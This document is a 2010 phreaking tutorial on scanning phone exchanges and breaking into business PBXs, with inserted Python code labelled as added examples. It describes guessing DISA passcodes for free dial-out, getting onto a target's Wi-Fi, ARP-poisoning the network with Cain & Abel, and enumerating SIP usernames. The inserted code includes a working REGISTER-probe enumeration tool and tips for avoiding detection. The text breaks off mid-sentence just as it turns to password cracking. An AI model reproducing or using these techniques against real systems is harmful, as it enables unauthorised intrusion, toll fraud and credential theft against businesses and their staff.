Phones & Tones Second Edition
the updated beginner's guide to phreaking in today's world
Published by: Murder Mouse on Jan 05, 2010
Copyright: Attribution Non-commercial

Section 1: The Introduction
----------------------------

Greets and meets. Well, it's definitely been a while since my last tutorial, and with a new decade upon us now is as great a time as ever for a much needed update. Phreaking has definitely seen some changes since I wrote the original release. Joybubbles is gone, VoIP is now the standard for almost any PBX, and in most cities in the US payphones are just a memory. In fact, as I'm writing this the FCC is already debating how to convert the entire PSTN to VoIP. As decades come and go the landscape of telephony is constantly changing, and with it so does phreaking. Whether the calls are carried through tandems or routers (technically on landline it's both), the drive to explore and understand this landscape will always keep phreakers going. So it's in this spirit that I write this guide.

One thing I'd like to point out before I get started is that I have decided to write this a little differently than my original release. I've stripped away much of the technical detail in favor of keeping the guide as simple and straightforward as possible. However, this means that I'm writing this guide with the assumption that you, the reader, already have at least a basic understanding of telecommunications. I've included some links and suggestions toward the end of this guide, and I'd suggest you check through them if you need to. So with all that said, let's begin.

Section 2: Exchange Scanning
----------------------------

Well, as before, let's start this discussion off with an explanation of exchange scanning. Exchange scanning, for those of you who don't know, is simply picking up the phone and dialing through a range of phone numbers to see what you come up with. This is how you will find all those interesting numbers you can fuck with and share (voicemail systems, test numbers, ANACs, strange recordings, etc). So how do you get started? Well, an exchange, also known as the NXX, is the middle three digits of a ten-digit number (NPA-NXX-XXXX, e.g. the xxx in 555-xxx-1337).
Most people when they first get started scan their own exchange, usually starting at the low end (NPA-NXX-00xx, NPA being the area code). So you would start off dialing NPA-NXX-0000, write down what you hear, then move on to 0001, 0002, and so on. If you're the paranoid type you might want to randomize your call sequence in order to make it slightly less obvious what you've been up to: go from 0000 to 0021, to 0076, to 0014, etc. until you've covered the first 100 numbers on the exchange. This is entirely up to you, and at least in the United States exchange scanning is legal in most areas (I think I remember reading about a law in Connecticut concerning this, but I'm not really sure on that). Either way, when scanning you will want to keep a list of the results for later review or to share. It's best to make some legends (acronyms) for yourself to abbreviate the most common finds while you're scanning. Below is the list I use for all of mine, which is partly based on the standard proposed on binrev a couple of years back.

CC - Cannot be completed
CR - Cannot be reached from your calling area
NS - Not in service
D - Disconnected
CB - All circuits busy
RO - Reorder
B - Busy
FX - Fax machine
R - Rings
HELO - Hello? (a live person answered)
VM - Voicemail
VMS - Voicemail system

Of course you're free to use whatever legends you like, but be sure you leave a list of them at the top of your exchange scans if you plan on sharing them with anyone. If you need some examples to go on you can check out some of Information Leak's exchange scans here:

www.informationleak.org/viewforum.php?f=43

It's also best to scan at different times of day depending on what kind of exchange scan you are doing. For local exchange scans, or any scan likely to hit a lot of residential lines, scan from mid-morning to mid-afternoon if you can, since most people will be up and out of the house (work, school, whatever). Any time that doesn't involve interrupting people's much needed sleep will work just fine. On the other hand, if you're doing a toll-free scan (1-800, 866, etc) or scanning a range assigned to a specific PBX (more on this later), then you'll want to scan in the middle of the night, after business hours, when the lines are unattended.

With all that said, I'll close this section as I did last time by helping you identify some of the sounds you'll come across while scanning.

Fax Machines - No need to tell you what a fax machine is, but you'll come across many of them while scanning, and being able to pick out their tones is important. Most fax machines you'll come across sound like a dialup modem handshake, but with a slightly flatter series of tones. It's hard to describe, but once you hear it it's easy to notice. Some fax machines have completely different tones: some have a low pulsing tone, and others a much more drawn-out series of tones.
You'll hear all of them as you scan, so it's a good idea to get familiar with these tones early on.

Milliwatt Test Numbers - These are one of the most common test numbers, and you'll be painfully aware of what they are when you stumble across one, literally. The tone is a very loud, steady tone (the standard milliwatt test tone is 1004 Hz at 0 dBm, which is why it sounds so much louder than anything else you dial).

ANACs - These are very common to come across, but if you're not paying attention to the recordings you stumble across you can easily miss them. They are especially common during toll-free scans, since many business recordings read off the ANI (and in some extremely rare cases even include the ANI II digits; feel privileged if you manage to snag a number like this). On the other hand, the ANACs that line technicians use are easy to pick out, since the recording immediately reads off the ANI. All I can tell you is pay attention.

DISAs - DISA stands for Direct Inward System Access: a dial-in port on a PBX that, after a passcode, hands the caller an internal dial tone so they can use the system's trunks and features from outside. They are a lot less common to come across than they were just a few years ago because, as I said in the introduction, most businesses and departments have upgraded their PBXs to VoIP systems. If you do come across one you'll recognize it in a few ways. Some of the older analog systems answer with a low, steady tone, but I haven't heard these any time I scan. Most of the analog PBXs still up and kicking will pick up with either complete silence (meaning it's waiting for DTMF input) or a dial tone. Of course there are other types of systems besides DISAs that will sit and wait for DTMF, but the login process is generally the same regardless.

DATUs - These are one of the best finds you can come across, but I'm not really sure how common a find they are these days, since DATUs have never really been a part of the telco here.
Back before AT&T bought out the area, BellSouth was using VoiceSystems, which functioned just like DATUs but required a specific modem in order to access the prompt (otherwise it would just hang up as soon as you called). Either way, these are administrative lines used by line technicians for basic repair and tests on subscriber lines within a given exchange, and you'll recognize one as a half ring followed by a low tone. I'll link some information on them later in the guide.

VMBs - By VMBs I don't mean the individual mailboxes you'll come across when scanning PBXs and such, but specifically the voicemail system lines for logging in and checking messages on the mailboxes. Just like ANACs, to fish these out you really just have to pay attention to any recordings you come across. Some voicemail systems will announce what kind of system they are as soon as you connect, while others will go straight to asking for your user ID. What to do from here will be discussed in a later section.

Once you get a handle on exchange scanning you should also look into unpublished exchanges. Most of these are the exchange codes you normally dial to reach common services (411, 911, 211, etc), but depending on the LEC there may also be a telco exchange used just for test numbers (like 959 in the AT&T areas). To find unpublished exchanges, go to nanpa.com and look at the Central Office Code Assignments for your area (remember, "Utilized" means in use). Compare this list to the exchanges in your phone book; any exchange that is assigned but not listed in the phone book, besides the obvious service codes mentioned above, can be considered a special-interest exchange.

Finally, before I finish here, I should mention that if handscanning seems too daunting and you really want to go the wardialer route (to each their own), and you're a Linux user, I'd suggest looking into iWar. It has plenty of nifty options, including support for protocols like IAX2.
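Whether you handscan or wardial, you still have to recognize what answered, and the descriptions above are by ear only. The following is an added example, not code from the guide or from iWar: a small pure-Python tone classifier that uses the Goertzel algorithm to tell a milliwatt test line, a fax machine's answer and calling tones, and dial tone apart, run here on constructed test clips. The frequencies it keys on are the standard values, which the guide does not give: 1004 Hz for the milliwatt tone, 2100 Hz for the fax CED answer tone, 1100 Hz for the fax CNG calling beeps (half a second on, three seconds off), and 350 + 440 Hz for North American dial tone. The 8 kHz sample rate, the 200 ms analysis window and the hit thresholds are my own choices.

```python
"""Goertzel-based tone classifier for scan recordings (added example).
Frequencies are the standard ones, not from the guide: milliwatt 1004 Hz,
fax CED 2100 Hz, fax CNG 1100 Hz pulsed 0.5 s on / 3 s off, dial tone
350 + 440 Hz. Sample rate, window and thresholds are assumptions."""
import math
import random

RATE = 8000  # Hz, telephone-quality audio

TONES = {
    "milliwatt": [1004.0],
    "fax_ced": [2100.0],
    "fax_cng": [1100.0],
    "dial_tone": [350.0, 440.0],
}


def goertzel(samples, freq, rate=RATE):
    """Power at `freq` in `samples` (Goertzel algorithm, one DFT bin).
    For a pure sine of amplitude A on an exact bin this is (A*N/2)**2."""
    n = len(samples)
    k = int(0.5 + n * freq / rate)
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev ** 2 + s_prev2 ** 2 - coeff * s_prev * s_prev2


def synth(freqs, seconds, rate=RATE, on=None, off=None, noise=0.02, seed=1):
    """Constructed clip: equal-amplitude sines, optionally gated on/off
    (as a fax CNG beep is), plus a little noise so it is not unrealistically
    clean."""
    rng = random.Random(seed)
    out = []
    for i in range(int(seconds * rate)):
        t = i / rate
        gate = 1.0
        if on is not None:
            gate = 1.0 if (t % (on + off)) < on else 0.0
        val = sum(math.sin(2 * math.pi * f * t) for f in freqs) / len(freqs)
        out.append(gate * val + rng.uniform(-noise, noise))
    return out


def tone_share(win, freqs, rate=RATE):
    """Fraction of the window's energy that sits on the given tone bins."""
    n = len(win)
    total = sum(x * x for x in win) * n / 2.0 + 1e-9  # (A*N/2)**2 scale
    return sum(goertzel(win, f, rate) for f in freqs) / total


def classify(samples, rate=RATE, window=0.2):
    """Name the tone in a clip, or "voice/other" if none dominates.

    The clip is cut into 200 ms windows (5 Hz bins, so 1004 Hz lands close
    enough to a bin). A window "hits" a tone when over half its energy is on
    that tone's bins. Continuous tones must hit in 80% of windows; CNG is
    pulsed, so 10% is enough for it."""
    n = int(window * rate)
    windows = [samples[i:i + n] for i in range(0, len(samples) - n + 1, n)]
    if not windows:
        raise ValueError("clip shorter than one window")
    scores = {}
    for name, freqs in TONES.items():
        hits = sum(1 for w in windows if tone_share(w, freqs, rate) > 0.5)
        scores[name] = hits / len(windows)
    best = max(scores, key=scores.get)
    needed = 0.1 if best == "fax_cng" else 0.8
    return best if scores[best] >= needed else "voice/other"


if __name__ == "__main__":
    for label, clip in [("milliwatt", synth([1004.0], 2.0)),
                        ("fax answer", synth([2100.0], 2.0)),
                        ("fax calling", synth([1100.0], 4.0, on=0.5, off=3.0)),
                        ("dial tone", synth([350.0, 440.0], 2.0)),
                        ("something else", synth([300.0, 725.0, 1810.0], 2.0))]:
        print("%-15s -> %s" % (label, classify(clip)))
```

To run it on a real recording, hand classify() a list of float samples in the range -1..1 (for example an 8 kHz mono WAV read with the wave module and scaled), a few seconds from the moment the far end answers. Modem and fax handshakes after the CED tone are wideband and will come out as "voice/other", which is the honest answer for anything this simple.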
Check the link below for details:

www.softwink.com/iwar/

Section 3: Hacking PBXs
-----------------------

Well, now that we're done with exchange scanning we can move on to PBXs. How you go about exploring, exploiting, fondling, or whatever you feel like doing with a PBX varies greatly depending on the kind of PBX it is, but a great place to start either way is to do a little poking around on the phone. First, crack open the phone book or go over to superpages.com and look up any business/department/etc. you have in mind to see all the listed numbers for that
organization. Some of the larger businesses in your area may have a range of numbers reserved; if so, you will see that all of the listed numbers look basically the same. Say the main office line is NPA-NXX-5500, their fax line is NPA-NXX-5504, and their accounting department is NPA-NXX-5542. Then it's safe to assume that a great place to start is the NPA-NXX-55xx range. Take note of all the numbers listed and start exchange scanning the rest to see what you come across. Otherwise, if there isn't a range to scan, try calling the main line (after business hours, of course) and listen through the recording. Sometimes the recording will go through a list of extensions for the different departments a caller might be inquiring about. Listening through this gives you the opportunity to figure out the extension range, which you can then scan through just like an exchange. Say the main office is 10, the accounting department is 15, the senior manager is 22, and so on; then it's safe to assume the range runs somewhere between 10 and 99. So, just like an exchange scan, you take note of all the extensions listed and then keep calling back and trying all the extensions that weren't mentioned. Most of the interesting extensions you'll come across will be at the end of the range (50, 99, 9999, wherever the range ends), since all the office/department lines are assigned from the start on up. If all you're after is the voicemail system (more on these later) then you can cut down how many times you have to call back by scanning up in tens: if the main office line is 10, start at 20 and keep going up until you find what you're looking for. Otherwise, trying them all will at the very least, as with an exchange scan, give you a decent idea of what kind of PBX you are dealing with. Say you hear a lot of Audix mailbox recordings; then you are dealing with an Avaya PBX (Audix is Avaya's voicemail product, and Avaya is a very popular VoIP PBX vendor).
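The range inference and the scanning shortcuts described here and in Section 2 (randomized call order, stepping up in tens when only the voicemail system matters, a shareable scan sheet with the legend at the top) are mechanical enough to script. The following is an added example in Python and is not from the guide; the NPA-NXX, the 5500/5504/5542 numbers, the 10/15/22 extensions and the scan results it is run on are the constructed ones from the text. It builds and records the dial list only; the dialing is still you or iWar.

```python
"""Dial-list builder for exchange and PBX extension scans (added example,
not part of the original guide). Numbers and extensions are constructed."""
import random

# The legend from Section 2; unknown codes are rejected when a sheet is built.
LEGEND = {"CC": "Cannot be completed", "CR": "Cannot be reached from your calling area",
          "NS": "Not in service", "D": "Disconnected", "CB": "All circuits busy",
          "RO": "Reorder", "B": "Busy", "FX": "Fax machine", "R": "Rings",
          "HELO": "Hello?", "VM": "Voicemail", "VMS": "Voicemail system"}


def infer_range(known):
    """Smallest run of aligned blocks of 100 containing the known numbers.

    5500, 5504, 5542 -> (4 digits, 5500, 5599); extensions 10, 15, 22 ->
    (2 digits, 0, 99). All known values must be digit strings of one width."""
    widths = {len(k) for k in known}
    if len(widths) != 1 or not all(k.isdigit() for k in known):
        raise ValueError("known numbers must be digit strings of one width: %r" % sorted(known))
    width = widths.pop()
    values = sorted(int(k) for k in known)
    lo = values[0] - values[0] % 100
    hi = values[-1] - values[-1] % 100 + 99
    return width, lo, hi


def build_dial_list(known, step=1, randomize=False, seed=None, prefix="",
                    skip_below_lowest=True):
    """Candidates to dial, as strings, excluding the numbers already known.

    step=10 is the guide's shortcut for finding the voicemail system at the
    end of the range; randomize shuffles the order for the paranoid;
    skip_below_lowest applies the guide's heuristic that nothing below the
    lowest listed number (the main line) is likely to be assigned."""
    width, lo, hi = infer_range(known)
    lowest = min(int(k) for k in known)
    known_set = set(known)
    cands = []
    for n in range(lo, hi + 1, step):
        if skip_below_lowest and n < lowest:
            continue
        s = "%0*d" % (width, n)
        if s not in known_set:
            cands.append(s)
    if randomize:
        random.Random(seed).shuffle(cands)
    return [prefix + c for c in cands]


def scan_sheet(title, results):
    """Render {number: legend code} as a shareable scan sheet, legend first."""
    lines = [title, "=" * len(title), "Legend:"]
    for code, meaning in LEGEND.items():
        lines.append("  %-4s %s" % (code, meaning))
    lines.append("")
    for number in sorted(results):
        code = results[number]
        if code not in LEGEND:
            raise ValueError("unknown legend code %r for %s" % (code, number))
        lines.append("%s  %s" % (number, code))
    return "\n".join(lines)


if __name__ == "__main__":
    # Exchange scan: first 100 numbers of a constructed NPA-NXX, shuffled.
    print(build_dial_list(["0000"], randomize=True, seed=1, prefix="555-555-")[:5])
    # Business block from the text: main 5500, fax 5504, accounting 5542.
    print(build_dial_list(["5500", "5504", "5542"])[:5], "...")
    # PBX extensions from the text, hunting the voicemail system in tens.
    print(build_dial_list(["10", "15", "22"], step=10))
    print(scan_sheet("555-555-00xx", {"555-555-0000": "R", "555-555-0001": "FX"}))
```

Feed the returned list to whatever you dial with, record one legend code per number, and scan_sheet() gives you the format the guide asks for when sharing, with the legend on top so nobody has to guess what "RO" meant.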
At the very least, listen for anything that could help you identify exactly what you're up against, and use Google to do a little homework on it. User guides, installation manuals, and the vendor sites themselves can give you a plethora of information you can use later on (default passwords, etc).

So let's say for starters that you're scanning an analog PBX and happen to come across a DISA line. From here you would try guessing the passcode and see if you get lucky. Try combinations like 9999#, 1234#, etc., and if you catch a dial tone then consider yourself lucky and use it however you like (dial out, fuck around with it a little, whatever).

Of course, a more likely scenario when scanning is that you don't find a DISA line but instead pick up enough recordings to figure out what kind of VoIP PBX you're dealing with and get all the information you need on it (Avaya, ShoreTel, etc). Then you'd pack up your laptop with a softphone like X-Lite installed (in case you want to dial out), get near the business you're targeting (during business hours), and see if there are any wireless access points you can use. How to crack the key if it's protected is beyond the scope of this tutorial, so let's just say for shits and giggles that there is an AP and it's unprotected. A good start from here would be to scan the network for SIP servers. SIP listens on port 5060 over either UDP or TCP (and on 5061 for SIP over TLS), so in nmap you would scan for it with the following, substituting the network's own range (UDP and SYN scans both need root):

nmap -sU -sS -p 5060,5061 192.168.1.1-254

A more thorough option for Windows users is to download SiVuS and scan the network that way. SiVuS has an entire suite of tools you can use to enumerate whatever information you can, and attempt some common attacks against the server (REGISTER attempts, all that good stuff).
Link provided below:

www.vopsecurity.org

Also, while I'm giving program suggestions, I would recommend checking out SIPVicious, which is a set of Python scripts that can be used for scanning, enumerating, and cracking SIP proxies and servers on the network:

http://sipvicious.org/blog/

So let's say of the three you decide to use SiVuS to scan for any weak points in the network. You will first want to see if you can find any SIP servers. Go to SIP Component Discovery and in the "Target network" field enter something like 192.168.1.1-254 (whatever the network range is), then click Scan. Let this run through and see if you find any SIP servers. If you do, you can now scan the SIP server for common weaknesses. Go to the SIP Scanner tab and click Scanner Configuration. Enter the SIP server you found before and check "Probe Targets". From here you can also configure other aspects like what sort of authentication to use (most SIP servers use MD5 digest authentication, but cleartext still isn't completely out of the question), what sort of method checks to run, security checks, the log file to save to, and other aspects of the scan. Then click over to the Scanner Control Panel tab and initiate the scan. What you can do from here depends on what you come across while scanning the network and what your SIP server scan pulled. A great place to start, if the scan didn't pull anything useful in your case, is to try to harvest some usernames from the server. For this you have two options: you can either manually test usernames with SiVuS, or use Cain & Abel to sniff usernames off the network. To manually test possible usernames in SiVuS, go to Utilities/Message Generator and fill out the appropriate information.
For example, set Method to REGISTER, Called User to the user you are attempting to get a response from, Domain Host to the IP or hostname of the SIP server you discovered, change the To to usertotesthere <sip:usertotesthere@sipserverhere.com> and From to whatever, and change Subject and User Agent to make it less obvious on the network what exactly you are doing. Then click Start and see what sort of response you get from the server. A 401 response means the server is willing to challenge that name, so you have a valid username, and a 403 means it's an invalid username. Be aware that this split depends on the server: some answer unknown users with 404 rather than 403, and a server configured to send the same 401 challenge for every REGISTER, whether or not the user exists, gives you nothing to enumerate by this route, so always compare the answer for a name you know is bogus. A good scheme to use, if you are somewhat familiar with the business/department you are dealing with, is to try the names of employees who work there: first name, first initial plus last name, first name plus last initial, etc. This is a popular scheme for a lot of places, so it's definitely worth a try. Even if you aren't familiar with the place you can take a casual visit into the business/department and keep a mental note of any employee names for future reference.

Of course, depending on the network it can often be a pretty hefty task to test every possible username that way, so let's get into sniffing the network for usernames. For this, like I said earlier, we will be using Cain & Abel, which can be downloaded here:

www.oxid.it/cain.html

What we first have to do is establish an ARP poison route on the network. Open up Cain & Abel and go to Configure. Select your network card and click OK. Click the + sign, which brings up the MAC Address Scanner; "All hosts in my subnet" should be active, so just press OK. Now click the + sign again and you should see a list of hosts on the network on the left side. Click on the IP of the SIP server, select all the IPs on the right side, then click OK. Now you can sniff all the usernames that pass through the server by looking at the To, From, and Contact fields on everything that goes by (this only works while the signaling is plain SIP on 5060; SIP over TLS on 5061 hides those headers from you).
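As an added example that is not code from the guide, SiVuS or SIPVicious, here is the REGISTER probe the Message Generator step builds, written out in Python, with a response classifier that applies the caveat above (a server that challenges every name is caught by probing several names and comparing the verdicts), and a header scraper that pulls usernames from the To/From/Contact fields of captured messages, which is what the Cain & Abel step is really doing. The domain pbx.example, the users, the addresses and the captured messages are constructed for the example; send_register() is the only part that touches the network and is not exercised offline.

```python
"""SIP REGISTER username probing and passive username harvesting (added
example; not code from the guide, SiVuS or SIPVicious). The domain
pbx.example, the users and the captured messages are constructed."""
import random
import re
import socket

# user part of a sip:/sips: URI, with or without angle brackets/display name
USER_RE = re.compile(r"<?sips?:([^@:;>]+)@")


def build_register(user, domain, local_ip="192.168.1.50", local_port=5060,
                   user_agent="softphone/1.0"):
    """Minimal RFC 3261 REGISTER for `user` at `domain` (the probe the text
    builds in SiVuS). User-Agent is settable because a tool's default
    value gives away on the wire what you are doing."""
    branch = "z9hG4bK%08x" % random.getrandbits(32)  # cookie prefix required
    tag = "%08x" % random.getrandbits(32)
    call_id = "%016x@%s" % (random.getrandbits(64), local_ip)
    lines = [
        "REGISTER sip:%s SIP/2.0" % domain,
        "Via: SIP/2.0/UDP %s:%d;branch=%s;rport" % (local_ip, local_port, branch),
        "Max-Forwards: 70",
        "From: <sip:%s@%s>;tag=%s" % (user, domain, tag),
        "To: <sip:%s@%s>" % (user, domain),
        "Call-ID: %s" % call_id,
        "CSeq: 1 REGISTER",
        "Contact: <sip:%s@%s:%d>" % (user, local_ip, local_port),
        "User-Agent: %s" % user_agent,
        "Expires: 3600",
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_response(raw):
    """(status code, {lower-case header name: value}) of a SIP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/2.0"):
        raise ValueError("not a SIP response: %r" % status_line)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def classify_response(raw):
    """Verdict on the probed user from one REGISTER reply.

    401 with WWW-Authenticate: the server will authenticate that name, so it
    probably exists. 403/404: rejected outright. 200: registered with no
    credentials at all. A server that challenges every name (Asterisk with
    alwaysauthreject=yes, for one) says 401 to valid and invalid users
    alike; enumerate_users() handles that by comparing several names."""
    code, headers = parse_response(raw)
    if code == 200:
        return "valid (registered without credentials)"
    if code == 401 and "www-authenticate" in headers:
        return "likely valid (challenged)"
    if code in (403, 404):
        return "invalid (rejected)"
    return "unknown (%d)" % code


def enumerate_users(candidates, domain, responder):
    """Probe every candidate through `responder(request) -> raw reply` and
    return {user: verdict} for the names judged valid. If all candidates
    draw the same verdict the server is not distinguishing them, and an
    empty dict is returned instead of a list of false positives."""
    verdicts = {u: classify_response(responder(build_register(u, domain)))
                for u in candidates}
    if len(set(verdicts.values())) < 2:
        return {}
    return {u: v for u, v in verdicts.items() if "valid" in v and "invalid" not in v}


def extract_users(messages):
    """Usernames in To/From/Contact (and compact forms t/f/m) of captured
    SIP messages of any method: what the Cain & Abel step looks for."""
    users = set()
    for msg in messages:
        for line in msg.split("\r\n"):
            name, _, value = line.partition(":")
            if name.strip().lower() in ("to", "from", "contact", "t", "f", "m"):
                m = USER_RE.search(value)
                if m:
                    users.add(m.group(1))
    return sorted(users)


def send_register(request, host, port=5060, timeout=2.0):
    """Send one probe over UDP and return the raw reply (not run offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(request.encode(), (host, port))
        return s.recv(4096).decode(errors="replace")
```

Against a live server you would pass `lambda r: send_register(r, "192.168.1.10")` as the responder and include at least one deliberately bogus name in the candidate list, since the comparison is what makes a 401 mean anything. A 200 reply means the server accepted the registration with no credentials; send the same request again with "Expires: 0" afterwards so you do not leave a binding pointing at your laptop.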
One way or another you should now have a decent list of usernames, so it's time to crack any of these users to get the password. From here you have two routes to go with, passive and active cracking. We'll first start off with active cracking. Open up SiVuS again and go to
